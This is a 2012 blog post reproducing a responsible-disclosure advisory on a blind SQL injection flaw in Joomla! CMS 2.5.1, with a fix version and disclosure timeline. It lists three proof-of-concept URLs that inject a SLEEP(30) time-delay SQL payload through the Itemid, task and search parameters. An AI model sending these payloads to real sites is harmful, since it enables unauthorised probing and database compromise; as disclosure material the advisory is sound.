Sunday, April 29, 2012

Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability

Description
Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.

Stratsec 
vulnerability researcher, Sow Ching Shiong has discovered Blind SQL Injection vulnerability in Joomla! CMS. This issue was discovered in a default installation of Joomla! CMS 2.5.1. Other earlier versions may also be affected.

Proof of concept URLs which will cause a time delay of 30 seconds are provided below:
  • http://[target]/[path]/index.php/using-joomla/extensions/components/search-component/smart-search?Itemid=466&option=1&q=3&searchword=Search...&task=search'%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
  • http://[target]/[path]/joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27
  • http://[target]/[path]/joomla/index.php?option=1&searchword={searchTerms}&Itemid='%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'

Solution
Update to version 2.5.2 or later.

References

Vendor URL: http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html
Stratsec: http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)

Disclosure Timeline
2012-02-29 - Vulnerability discovered.
2012-02-29 - Vulnerability reported to vendor.
2012-03-01 - Vendor acknowledged and confirmed the vulnerability.
2012-03-05 - Patch released.
2012-03-19 - Advisory published by Stratsec.

1 comment: